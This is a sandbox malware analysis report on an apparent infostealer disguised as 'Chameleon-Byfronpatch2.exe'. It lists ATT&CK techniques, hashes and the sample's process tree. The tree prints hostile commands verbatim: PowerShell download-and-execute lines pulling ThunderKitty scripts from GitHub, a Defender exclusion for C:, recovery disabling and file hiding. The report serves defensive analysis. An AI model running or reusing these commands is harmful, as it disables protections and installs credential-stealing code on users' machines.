585c788d34f68b6fdc7695d5752e6450ae5f3e2c7dfd0dabaafefc598b29ecdb

Analysis

max time kernel
65s
max time network
68s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
15/08/2024, 02:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Chameleon-Byfronpatch2.exe
Size

9.2MB
MD5

addbf6301c1ea797554a0152da23d5ae
SHA1

01a22ed2bb77ff84546147098348a07bc0eecbc6
SHA256

585c788d34f68b6fdc7695d5752e6450ae5f3e2c7dfd0dabaafefc598b29ecdb
SHA512

9507a56c571d1f9ddf67dd9b5200c340416b00bb956c52fa88b8cd2108d5f789cdf5c04d60aa06c5c9bde8bec2e6a324c89435eec57708e1f66fd0a98c767a11
SSDEEP

98304:NLTHcOdLkG6nUDvQlPU68hkY8LdYwTE/zTPy2R0r:mOdLkG9TChA/zLc

Score

9^/10

credential_access discovery evasion execution persistence privilege_escalation spyware stealer

Malware Config

Signatures

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 2 IoCs

flow	pid	Process
14	5008	powershell.exe
15	1700	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
5008	powershell.exe
1700	powershell.exe
1552	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Drivers\etc\hosts	Chameleon-Byfronpatch2.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
4792	netsh.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
13	raw.githubusercontent.com
14	raw.githubusercontent.com
15	raw.githubusercontent.com

Network Service Discovery 1 TTPs 1 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
5068	ARP.EXE

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\Recovery	reagentc.exe
File opened for modification	C:\Windows\system32\Recovery\ReAgent.xml	reagentc.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Logs\ReAgent\ReAgent.log	reagentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	reagentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	reagentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	reagentc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
1472	netsh.exe
4000	netsh.exe

System Network Connections Discovery 1 TTPs 1 IoCs

Attempt to get a listing of network connections.

discovery

System Network Connections Discovery

T1049

pid	Process
3412	NETSTAT.EXE

Gathers network information 2 TTPs 3 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
1568	ipconfig.exe
3016	ipconfig.exe
3412	NETSTAT.EXE

Runs net.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
1700	powershell.exe
5008	powershell.exe
1700	powershell.exe
1552	powershell.exe
5008	powershell.exe
1552	powershell.exe
5008	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1700	powershell.exe
Token: SeDebugPrivilege	5008	powershell.exe
Token: SeDebugPrivilege	1552	powershell.exe
Token: SeIncreaseQuotaPrivilege	5008	powershell.exe
Token: SeSecurityPrivilege	5008	powershell.exe
Token: SeTakeOwnershipPrivilege	5008	powershell.exe
Token: SeLoadDriverPrivilege	5008	powershell.exe
Token: SeSystemProfilePrivilege	5008	powershell.exe
Token: SeSystemtimePrivilege	5008	powershell.exe
Token: SeProfSingleProcessPrivilege	5008	powershell.exe
Token: SeIncBasePriorityPrivilege	5008	powershell.exe
Token: SeCreatePagefilePrivilege	5008	powershell.exe
Token: SeBackupPrivilege	5008	powershell.exe
Token: SeRestorePrivilege	5008	powershell.exe
Token: SeShutdownPrivilege	5008	powershell.exe
Token: SeDebugPrivilege	5008	powershell.exe
Token: SeSystemEnvironmentPrivilege	5008	powershell.exe
Token: SeRemoteShutdownPrivilege	5008	powershell.exe
Token: SeUndockPrivilege	5008	powershell.exe
Token: SeManageVolumePrivilege	5008	powershell.exe
Token: 33	5008	powershell.exe
Token: 34	5008	powershell.exe
Token: 35	5008	powershell.exe
Token: 36	5008	powershell.exe
Token: SeIncreaseQuotaPrivilege	5008	powershell.exe
Token: SeSecurityPrivilege	5008	powershell.exe
Token: SeTakeOwnershipPrivilege	5008	powershell.exe
Token: SeLoadDriverPrivilege	5008	powershell.exe
Token: SeSystemProfilePrivilege	5008	powershell.exe
Token: SeSystemtimePrivilege	5008	powershell.exe
Token: SeProfSingleProcessPrivilege	5008	powershell.exe
Token: SeIncBasePriorityPrivilege	5008	powershell.exe
Token: SeCreatePagefilePrivilege	5008	powershell.exe
Token: SeBackupPrivilege	5008	powershell.exe
Token: SeRestorePrivilege	5008	powershell.exe
Token: SeShutdownPrivilege	5008	powershell.exe
Token: SeDebugPrivilege	5008	powershell.exe
Token: SeSystemEnvironmentPrivilege	5008	powershell.exe
Token: SeRemoteShutdownPrivilege	5008	powershell.exe
Token: SeUndockPrivilege	5008	powershell.exe
Token: SeManageVolumePrivilege	5008	powershell.exe
Token: 33	5008	powershell.exe
Token: 34	5008	powershell.exe
Token: 35	5008	powershell.exe
Token: 36	5008	powershell.exe
Token: SeIncreaseQuotaPrivilege	5008	powershell.exe
Token: SeSecurityPrivilege	5008	powershell.exe
Token: SeTakeOwnershipPrivilege	5008	powershell.exe
Token: SeLoadDriverPrivilege	5008	powershell.exe
Token: SeSystemProfilePrivilege	5008	powershell.exe
Token: SeSystemtimePrivilege	5008	powershell.exe
Token: SeProfSingleProcessPrivilege	5008	powershell.exe
Token: SeIncBasePriorityPrivilege	5008	powershell.exe
Token: SeCreatePagefilePrivilege	5008	powershell.exe
Token: SeBackupPrivilege	5008	powershell.exe
Token: SeRestorePrivilege	5008	powershell.exe
Token: SeShutdownPrivilege	5008	powershell.exe
Token: SeDebugPrivilege	5008	powershell.exe
Token: SeSystemEnvironmentPrivilege	5008	powershell.exe
Token: SeRemoteShutdownPrivilege	5008	powershell.exe
Token: SeUndockPrivilege	5008	powershell.exe
Token: SeManageVolumePrivilege	5008	powershell.exe
Token: 33	5008	powershell.exe
Token: 34	5008	powershell.exe

Suspicious use of WriteProcessMemory 56 IoCs

description	pid	Process	procid_target
PID 4588 wrote to memory of 4616	4588	Chameleon-Byfronpatch2.exe	84
PID 4588 wrote to memory of 4616	4588	Chameleon-Byfronpatch2.exe	84
PID 4588 wrote to memory of 1552	4588	Chameleon-Byfronpatch2.exe	86
PID 4588 wrote to memory of 1552	4588	Chameleon-Byfronpatch2.exe	86
PID 4588 wrote to memory of 1700	4588	Chameleon-Byfronpatch2.exe	87
PID 4588 wrote to memory of 1700	4588	Chameleon-Byfronpatch2.exe	87
PID 4588 wrote to memory of 5008	4588	Chameleon-Byfronpatch2.exe	89
PID 4588 wrote to memory of 5008	4588	Chameleon-Byfronpatch2.exe	89
PID 4588 wrote to memory of 1772	4588	Chameleon-Byfronpatch2.exe	90
PID 4588 wrote to memory of 1772	4588	Chameleon-Byfronpatch2.exe	90
PID 4588 wrote to memory of 2408	4588	Chameleon-Byfronpatch2.exe	92
PID 4588 wrote to memory of 2408	4588	Chameleon-Byfronpatch2.exe	92
PID 2408 wrote to memory of 1864	2408	cmd.exe	96
PID 2408 wrote to memory of 1864	2408	cmd.exe	96
PID 1700 wrote to memory of 2312	1700	powershell.exe	97
PID 1700 wrote to memory of 2312	1700	powershell.exe	97
PID 5008 wrote to memory of 4476	5008	powershell.exe	98
PID 5008 wrote to memory of 4476	5008	powershell.exe	98
PID 2312 wrote to memory of 2528	2312	csc.exe	99
PID 2312 wrote to memory of 2528	2312	csc.exe	99
PID 4476 wrote to memory of 4220	4476	csc.exe	100
PID 4476 wrote to memory of 4220	4476	csc.exe	100
PID 5008 wrote to memory of 1472	5008	powershell.exe	104
PID 5008 wrote to memory of 1472	5008	powershell.exe	104
PID 5008 wrote to memory of 4448	5008	powershell.exe	106
PID 5008 wrote to memory of 4448	5008	powershell.exe	106
PID 4448 wrote to memory of 2424	4448	net.exe	107
PID 4448 wrote to memory of 2424	4448	net.exe	107
PID 5008 wrote to memory of 4792	5008	powershell.exe	108
PID 5008 wrote to memory of 4792	5008	powershell.exe	108
PID 5008 wrote to memory of 3392	5008	powershell.exe	109
PID 5008 wrote to memory of 3392	5008	powershell.exe	109
PID 5008 wrote to memory of 4328	5008	powershell.exe	110
PID 5008 wrote to memory of 4328	5008	powershell.exe	110
PID 4328 wrote to memory of 1972	4328	net.exe	111
PID 4328 wrote to memory of 1972	4328	net.exe	111
PID 5008 wrote to memory of 3016	5008	powershell.exe	112
PID 5008 wrote to memory of 3016	5008	powershell.exe	112
PID 5008 wrote to memory of 4616	5008	powershell.exe	113
PID 5008 wrote to memory of 4616	5008	powershell.exe	113
PID 4616 wrote to memory of 672	4616	net.exe	114
PID 4616 wrote to memory of 672	4616	net.exe	114
PID 5008 wrote to memory of 1704	5008	powershell.exe	115
PID 5008 wrote to memory of 1704	5008	powershell.exe	115
PID 5008 wrote to memory of 3412	5008	powershell.exe	118
PID 5008 wrote to memory of 3412	5008	powershell.exe	118
PID 5008 wrote to memory of 2300	5008	powershell.exe	119
PID 5008 wrote to memory of 2300	5008	powershell.exe	119
PID 5008 wrote to memory of 1568	5008	powershell.exe	120
PID 5008 wrote to memory of 1568	5008	powershell.exe	120
PID 5008 wrote to memory of 3388	5008	powershell.exe	121
PID 5008 wrote to memory of 3388	5008	powershell.exe	121
PID 5008 wrote to memory of 5068	5008	powershell.exe	122
PID 5008 wrote to memory of 5068	5008	powershell.exe	122
PID 5008 wrote to memory of 4000	5008	powershell.exe	123
PID 5008 wrote to memory of 4000	5008	powershell.exe	123

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4616	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Chameleon-Byfronpatch2.exe
"C:\Users\Admin\AppData\Local\Temp\Chameleon-Byfronpatch2.exe"
1⤵
- Drops file in Drivers directory
- Suspicious use of WriteProcessMemory
PID:4588
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
  2⤵
  - Views/modifies file attributes
  PID:4616
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -C "Add-MpPreference -ExclusionPath 'C:'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1552
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1')|iex"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1700
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\linjzyhx\linjzyhx.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2312
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1E51.tmp" "c:\Users\Admin\AppData\Local\Temp\linjzyhx\CSC12E5821D9B364D588DADB6BA596D8A2B.TMP"
      4⤵
      PID:2528
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1')|iex"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:5008
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yvotcysp\yvotcysp.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4476
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1E60.tmp" "c:\Users\Admin\AppData\Local\Temp\yvotcysp\CSC35A0586744CA461B8B6D127BDDE5DC0.TMP"
      4⤵
      PID:4220
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" wlan show profiles
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:1472
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup administrators
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4448
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup administrators
      4⤵
      PID:2424
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" advfirewall show allprofiles
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:4792
- - C:\Windows\system32\whoami.exe
    "C:\Windows\system32\whoami.exe" /all
    3⤵
    PID:3392
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" user
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4328
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user
      4⤵
      PID:1972
- - C:\Windows\system32\ipconfig.exe
    "C:\Windows\system32\ipconfig.exe" /displaydns
    3⤵
    - Gathers network information
    PID:3016
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4616
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup
      4⤵
      PID:672
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" startup get command caption
    3⤵
    PID:1704
- - C:\Windows\system32\NETSTAT.EXE
    "C:\Windows\system32\NETSTAT.EXE" -ano
    3⤵
    - System Network Connections Discovery
    - Gathers network information
    PID:3412
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe
    3⤵
    PID:2300
- - C:\Windows\system32\ipconfig.exe
    "C:\Windows\system32\ipconfig.exe" /all
    3⤵
    - Gathers network information
    PID:1568
- - C:\Windows\system32\ROUTE.EXE
    "C:\Windows\system32\ROUTE.EXE" print
    3⤵
    PID:3388
- - C:\Windows\system32\ARP.EXE
    "C:\Windows\system32\ARP.EXE" -a
    3⤵
    - Network Service Discovery
    PID:5068
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" wlan show profile
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:4000
- C:\Windows\system32\reagentc.exe
  reagentc.exe /disable
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  PID:1772
- C:\Windows\system32\cmd.exe
  cmd /c rundll32.exe user32.dll,SwapMouseButton
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2408
- - C:\Windows\system32\rundll32.exe
    rundll32.exe user32.dll,SwapMouseButton
    3⤵
    PID:1864

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Network Service Discovery

T1046

Permission Groups Discovery

T1069

Local Groups

T1069.001

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

System Network Connections Discovery

T1049

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ea0413e51ef38259e06b050572f3bb28

SHA1
9dc6bce7acbda89540b7eb2e3ca25515186d0f7a

SHA256
0a26e334891fed3b196468aa0ad8771a62ef70e7f1630d43003c03947764529f

SHA512
0e17e9a38123d6d8a29cda725be15ac0c3ff0535bd8a8bb68560ac41670ec347cf1f144dab600ab35391cb5820bfb3188bf2e071ae366146bacc964bd46c0b88

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5e621802b71e3ece88354ee557e1ce88

SHA1
0a7bb0acee1ebc8281bd24ef0084076e03f93e1f

SHA256
80a94ab0d20a51881a420cf64826b30e621d94245304be8b35af5cac389bc587

SHA512
31038c0107f0111eef87385a6ec7ef56ec9833fd5ef85187e58c9b32917ba8b90fb7c1bb2efbf273f1ee3a03744ca61d3f4d6f25029b9715eca216be2d80ef01

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES1E51.tmp

Filesize
1KB

MD5
bc7c8cc71dd5b78c0aece047cf351b04

SHA1
d7787f97d5a909cafa7e8d915d24f9bb1c3fc203

SHA256
da89883857a499f47fd4de55981e8f07b095f9bdb1941da7ed24cf2b210ccf8c

SHA512
41949c15f186112e213518021a9766d97a1cc1e57c10dc778e6ef737bc768f2d15cdc03d62f4f3effb78646e06bdd894728222eaf9360df7f292655922dd3167

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES1E60.tmp

Filesize
1KB

MD5
d02d7b5b2f4c6a414e19fdc97223c6f5

SHA1
9d4ea43b4f08644d4609aa820aa5643a375ab3ac

SHA256
6f67d85edc48525ec7dcbfdc0f11e7f384639558765e0a08ce610850cd6525da

SHA512
4fe8c86e137b39f563327a188650a2319900fad6dd88f98ed76fbd6e235329a03706b9968943dcf293f730ebe097efecba674843634c2232996e4679b4673f82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ThunderKitty.zip

Filesize
408KB

MD5
7baa4716079866145d9d8e468a9d46fb

SHA1
2b24f9e0967ab2b1d46298497a51b9b5a937f34c

SHA256
6e0ab1b75dfc86c1323ccf3d0c628f60c2874e06b71ba233eaf5491bbd2c66fe

SHA512
5be8463b7ec280336a7603c19dd4716e711f17bbece02254899df2103e5893db0b0e29e861f65868127d0e716bee7b524376fde3a6afff1217ef270b1bbf0eda

Download Submit
C:\Users\Admin\AppData\Local\Temp\ThunderKitty\SystemInfo\ThunderKitty-ScrapedCMDS.txt

Filesize
62KB

MD5
5e44e46a754ce7b84356fcfdfe7450ca

SHA1
f0c0b5670d575e33a964b323af1a22d5d30eba04

SHA256
5c0ffc968efcf6ae51dc1db0d5dbf77691fa564697612e3a37b0aa72e576b42c

SHA512
811d42d730bb6ea97170f49d3e29db4303e62d4a8e539c03487ad6abab18754ff2245c049ae90a5186316a9158dd9afbd31f8175be2d4eb5e86bb897c985b3bd

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ixjsgl0w.fcb.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\linjzyhx\linjzyhx.dll

Filesize
4KB

MD5
a29e1dc24205da45093968cc790ff902

SHA1
a21ab9e31627371a74c0ccde3027f021a603720b

SHA256
bd763212fbe475604a5710292cdd344ab5c3f34679a364e90afc832d8484a89d

SHA512
ceea58370df05152c1d7a94cccc91b628638591a214acfaf72de48fa9c4394c845b88948f48e66d9d19340b3cf7274870b73b4bd25fbe63bb27f97a023c89ae7

Download Submit
C:\Users\Admin\AppData\Local\Temp\yvotcysp\yvotcysp.dll

Filesize
4KB

MD5
a5ea555e0ed6c651fe07b7357331972c

SHA1
a00b06393e5ed6e840e2c23aaab7b0b05c75d751

SHA256
500439119d368cb60bb41e95de96f78037d15796d19cbc9a3eb07ddf7ad5d777

SHA512
d2198a944fbd77f103f8187522f62dff3294362638c00d261bcc1df8cc16f68bd316ec77ec82ba4f458ef780016aec1399696e1cf3ca04711c5b91d92c026e38

Download Submit
C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1

Filesize
2KB

MD5
9758656bbe8589c66bb241b052490c72

SHA1
b73da83fb3ae6b86c6365769a04de9845d5c602c

SHA256
e4bfe191530cc53138c4a265755539f8a115f7828faba79dfac91f3184b26351

SHA512
da9a8ecba8c2071e467f2d72fac524843fb0011c8486dd95e8b948b1c7f91bf02bcb80c20a01eddb6971b96db5ebde5f7c4c607e6b6d15e75d971ea104436e34

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
2KB

MD5
33963639fb0ee0d79107103504711c9e

SHA1
b5c525632b94582ac863c600bc613ab658fab61b

SHA256
c2d71376ebf448ca83881ffed011973822c8f755a563b1087214bf571692ad89

SHA512
b61a4f6b3a81aac3dd9a35d837232562c5d927647a639ef6eb728479f947d63f32889371f438b3bbf075ec9bbbe81cd0b06c4647d4329d74eaa4dc979ad6787d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\linjzyhx\CSC12E5821D9B364D588DADB6BA596D8A2B.TMP

Filesize
652B

MD5
d6f5038c951e45464bb68979b23c8dcd

SHA1
cc48450aa3377be74e7db073b883046f90e0816b

SHA256
4011da6e33bba0491ff8b69b232a0473a26d7eda2e72cb33f66ce73712b2e2a1

SHA512
0b299b420010887a7996a2792a1f0b14720da3e3aba64472dc5b45aaeb6065b708fbc0ba30335e0ff195eafa2527d5dc3d6a2c5925dbb855f925ff1d95d11203

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\linjzyhx\linjzyhx.0.cs

Filesize
1KB

MD5
8a1e7edb2117ec5dde9a07016905923b

SHA1
0155dbeeb16333e2eaa767b0209750efee56f47f

SHA256
c379ac84c970f2055851b084c44575a5e4b5a70dc25f0acdd49aad306489b007

SHA512
4ff0601803a006c661c962fe158cd5e9f40031d6b4fd7c5a05969a52d812e1fcb0aab20916fcad6c61c6d44cc7cfdf1e4f344f22ced937a0cd757ad841d3ab21

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\linjzyhx\linjzyhx.cmdline

Filesize
369B

MD5
60ff050e1aad02f94be619fd2d0a88ec

SHA1
738ba404fff567fb9b03c7bba4355e5ed7b4aae3

SHA256
1a32f1770c4272395bf72f4b450540dc462ef131b3f9291949407c76a6b098b7

SHA512
12697ad898f0baf2ca5f63be55abaf4ff3beb93255e0793591c1182639de7abc085d1ccce09830592f75a1f76544c3965e59e3d48a40721116a48d4e57c9406f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\yvotcysp\CSC35A0586744CA461B8B6D127BDDE5DC0.TMP

Filesize
652B

MD5
fc85dfca5a702a997882061750cafb9a

SHA1
6ca506099f01ee1f173508ba57e1acb2d5576f08

SHA256
806b171fef0ef35caf865568b29a0b808af77671a1f9513d75cd10c10e7cf58b

SHA512
b101e3d9a41b8cec7336594475c011ff16112c5fdf663caccfaceb80eb02b74a69265772c696ffa5dbf0406abc83195314d7855d1d025817b682a8869af7b148

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\yvotcysp\yvotcysp.cmdline

Filesize
369B

MD5
0cadd60bf5b3a7bd4c84a4ae27bac26a

SHA1
d373cbdd5d28187b1e17cec51acb3585f877a0d8

SHA256
46e5716696e4d361162f14696080d85d7286737ecde8145bcff1b17f458aad98

SHA512
0b7b6263dff394680af79276dfae75b51d6f9b4c68b435a9fcfaa91f8db7ebc4b7437d0e0279b9f0864106d30b1d9b07430fb4366b44373f7bd4f8ddc0e29af9

Download Submit
memory/1700-72-0x000001C7A0620000-0x000001C7A0628000-memory.dmp

Filesize
32KB

Download
memory/1700-83-0x00007FF813C50000-0x00007FF814711000-memory.dmp

Filesize
10.8MB

Download
memory/1700-19-0x00007FF813C50000-0x00007FF814711000-memory.dmp

Filesize
10.8MB

Download
memory/1700-7-0x00007FF813C50000-0x00007FF814711000-memory.dmp

Filesize
10.8MB

Download
memory/1700-5-0x000001C7A05F0000-0x000001C7A0612000-memory.dmp

Filesize
136KB

Download
memory/1700-3-0x00007FF813C53000-0x00007FF813C55000-memory.dmp

Filesize
8KB

Download
memory/5008-40-0x00007FF813C50000-0x00007FF814711000-memory.dmp

Filesize
10.8MB

Download
memory/5008-86-0x000001C663600000-0x000001C66362A000-memory.dmp

Filesize
168KB

Download
memory/5008-87-0x000001C663600000-0x000001C663624000-memory.dmp

Filesize
144KB

Download
memory/5008-77-0x000001C663A80000-0x000001C664226000-memory.dmp

Filesize
7.6MB

Download
memory/5008-75-0x000001C64A5A0000-0x000001C64A5A8000-memory.dmp

Filesize
32KB

Download
memory/5008-119-0x000001C663600000-0x000001C663612000-memory.dmp

Filesize
72KB

Download
memory/5008-120-0x000001C6635F0000-0x000001C6635FA000-memory.dmp

Filesize
40KB

Download
memory/5008-36-0x00007FF813C50000-0x00007FF814711000-memory.dmp

Filesize
10.8MB

Download
memory/5008-129-0x00007FF813C50000-0x00007FF814711000-memory.dmp

Filesize
10.8MB

Download
memory/5008-29-0x00007FF813C50000-0x00007FF814711000-memory.dmp

Filesize
10.8MB

Download